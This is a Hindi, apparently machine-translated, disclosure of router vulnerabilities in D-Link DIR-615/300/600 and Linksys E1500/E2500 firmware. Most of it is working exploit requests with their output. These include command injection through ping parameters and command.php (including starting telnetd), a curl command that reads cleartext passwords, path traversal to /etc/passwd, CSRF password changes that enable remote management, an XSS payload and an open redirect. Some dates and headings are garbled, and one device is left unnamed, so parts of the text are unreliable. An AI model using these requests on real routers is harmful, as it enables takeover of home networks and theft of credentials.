विभिन्न राउटरों में एक और शून्य-दिन की कमजोरियां

यह आरोप लगाया गया है कि समस्या 4 सितंबर, 2012 के फर्मवेयर संस्करण 8.04, और 18 जनवरी, 2013 के 8.04 में संशोधन की है। हालांकि, मैं इन संस्करणों को विक्रेता की आधिकारिक वेबसाइट पर नहीं खोज सका।

मनमाना राउटर OS आदेशों को निष्पादित करना

एक अधिकृत उपयोगकर्ता GET अनुरोध भेजकर डिवाइस पर एक मनमाना आदेश निष्पादित कर सकता है जिसमें कमांड ping_ipaddr पैरामीटर में पारित हो जाएंगे

एक उदाहरण:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr= http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= 

कमांड की प्रतिक्रिया HTTP प्रतिक्रिया के मुख्य भाग में आती है:

 HTTP/1.0 200 OK Pragma: no-cache Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script type="text/javascript" src="common.js.htm"></script> <script language="javascript"> CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS}); var pingResult="Domain"; var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<== var vctinfo= [ {ethport:'0', status:'0', rate:'0', dup:'0'}, {ethport:'1', status:'0', rate:'0', dup:'0'}, {ethport:'2', status:'0', rate:'0', dup:'0'}, 

शायद कोई यह पूछेगा: "क्या भेद्यता है, अगर यह केवल एक अधिकृत उपयोगकर्ता के लिए संभव है"? मैं समझाता हूं: एक हमलावर सोशल इंजीनियरिंग का उपयोग कर सकता है और राउटर के मालिक के लिए विशेष रूप से गठित लिंक को फेंक सकता है।

खुलासे

फॉर्म के पते पर अनुरोध प्राप्त करें

 http://IP_/gconfig.htm 

हमारे पास वापस आ जाएगी:

 var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0} 

पुराना दर्ज किए बिना पासवर्ड बदलें

निम्नलिखित सामग्री के साथ GET अनुरोध भेजने के लिए पर्याप्त है:

 http://IP_/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 

डी-लिंक के प्रतिनिधियों को सुरक्षा समस्याओं के बारे में सूचित किया गया था, लेकिन कहा गया कि कोई फिक्स नहीं होगा क्योंकि उनकी राय में, यह उनके उपकरणों में समस्या नहीं है, लेकिन अपने उपकरणों के ब्राउज़र और उपयोगकर्ताओं में स्वयं।

डीआईआर -300 - कमजोर संस्करण:

• २.१२/२/२०१२
• 2.13 दिनांक 11/07/2012

डीआईआर -600 - कमजोर संस्करण:

• २.१२ बी ०२ दिनांक ०१/१ d/२०१२
• 11/11/2012 से 2.13b01
• 2.14b01 दिनांक 01/22/2013

मनमाना राउटर OS आदेशों को निष्पादित करना

एक अनधिकृत उपयोगकर्ता डिवाइस पर एक मनमाना आदेश निष्पादित कर सकता है एक GET अनुरोध भेजकर जिसमें कमांड cmd पैरामीटर में पारित किया जाएगा

उदाहरण - टेलनेट सर्वर शुरू करना

 Request: POST /command.php HTTP/1.1 Host: 192.168.178.222 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.178.222/ Content-Length: 15 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache cmd=telnetd; 

संवेदनशील जानकारी का असुरक्षित भंडारण

डिवाइस पर पासवर्ड हैशिंग के बिना, स्पष्ट पाठ में संग्रहीत हैं:

 # cat var/passwd "admin" "test" "0" 

आप वर्तमान उपयोगकर्ता पासवर्ड को इस तरह देख सकते हैं:

 root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php "admin" "THESECRETPASS" "0" 

खुलासे

अनुरोध टाइप करें:

 http://Target-IP/DevInfo.txt 

हमारे पास वापस आ जाएगी:

 HTTP/1.1 200 OK Server: Linux, HTTP/1.1, DIR-600 Ver 2.14 Date: Fri, 31 Dec 1999 18:04:13 GMT Content-Length: 267 Firmware External Version: V2.14 Firmware Internal Version: d1mg Model Name: DIR-600 Hardware Version: Bx WLAN Domain: 826 Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: <snip> WAN MAC: <snip> WLAN MAC: <snip> 

डी-लिंक के प्रतिनिधियों को सुरक्षा समस्याओं के बारे में सूचित किया गया था, लेकिन कहा गया कि कोई फिक्स नहीं होगा क्योंकि उनकी राय में, यह उनके उपकरणों में समस्या नहीं है, लेकिन अपने उपकरणों के ब्राउज़र और उपयोगकर्ताओं में स्वयं।

कमजोर फर्मवेयर संस्करण:

फर्मवेयर संस्करण: 1.0.4.80
कर्नेल संस्करण: 4.1-18
वेब सर्वर संस्करण: १.५

डिवाइस पर फाइल पढ़ना

एक अधिकृत उपयोगकर्ता डिवाइस पर फाइलें पढ़ सकता है

 http://IP_/../../etc/passwd 

जैसे कोई उत्तर देगा:

 HTTP/1.0 200 OK Content-type: text/plain Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 root:x:0:0:root:/root:/bin/bash demo:x:5000:100:Demo User:/home/demo:/bin/bash nobody:x:65534:65534:Nobody:/htdocs:/bin/bash 

निर्देशिकाएँ उसी तरह से पढ़ी जाती हैं:

 /../../var/ HTTP/1.0 200 OK Content-type: text/html Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0 <H1>Index of ../../var/</H1> <p><a href="/../../var/.">.</a></p> <p><a href="/../../var/..">..</a></p> <p><a href="/../../var/.Skype">.Skype</a></p> <p><a href="/../../var/jffs2">jffs2</a></p> <p><a href="/../../var/htdocs">htdocs</a></p> <p><a href="/../../var/cnxt">cnxt</a></p> <p><a href="/../../var/ppp">ppp</a></p> <p><a href="/../../var/conf">conf</a></p> <p><a href="/../../var/bin">bin</a></p> <p><a href="/../../var/usr">usr</a></p> <p><a href="/../../var/tmp">tmp</a></p> 

लेकिन कब से डिवाइस पर अधिकृत होना आवश्यक है और अनुरोध का जवाब प्राप्त करना आवश्यक है - यह पूरी तरह से स्पष्ट नहीं है कि कोई हमलावर इसका लाभ कैसे उठा सकता है

क्रॉसिंग स्क्रिप्टिंग

एक "कारखाना" खाते की उपस्थिति

डिफ़ॉल्ट रूप से, डिवाइस का उपयोगकर्ता नाम: पासवर्ड सेवा: सेवा के साथ एक खाता है। जैसा कि मैं इसे समझता हूं, नियमित तरीकों से इसे प्रदान करने का कोई तरीका नहीं है।

निर्माता को अगस्त 2012 में सुरक्षा समस्याओं के बारे में सूचित किया गया था, लेकिन उसने कोई जवाब नहीं दिया।

कमजोर फर्मवेयर संस्करण:
e1500:

• v1.0.00 - 9-फरवरी 17, 2011 का निर्माण
• v1.0.04 - बिल्ड 2 - 8 मार्च 2012
• v1.0.05 - निर्माण 1 - 23 अगस्त, 2012

E2500

• v1.0.03

मनमाना राउटर OS आदेशों को निष्पादित करना

एक अधिकृत उपयोगकर्ता GET अनुरोध भेजकर डिवाइस पर एक मनमाना कमांड निष्पादित कर सकता है जिसमें कमांड ping_size पैरामीटर में पारित किए जाएंगे।

एक उदाहरण:

 http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= 

निर्देशिका का विस्तार

एक उदाहरण:

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 75 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version 

फॉर्म का जवाब आएगा:

 HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012 

पुराना दर्ज किए बिना पासवर्ड बदलें

एक अधिकृत उपयोगकर्ता डिवाइस में विशेष रूप से उत्पन्न POST अनुरोध भेजकर पासवर्ड बदल सकता है:

 POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Management.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 311 submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 

पासवर्ड CSRF हमला:

 http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 

क्रॉसिंग स्क्रिप्टिंग

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 300 submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 

किसी अन्य साइट पर पुनर्निर्देशित करें

 POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 290 submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0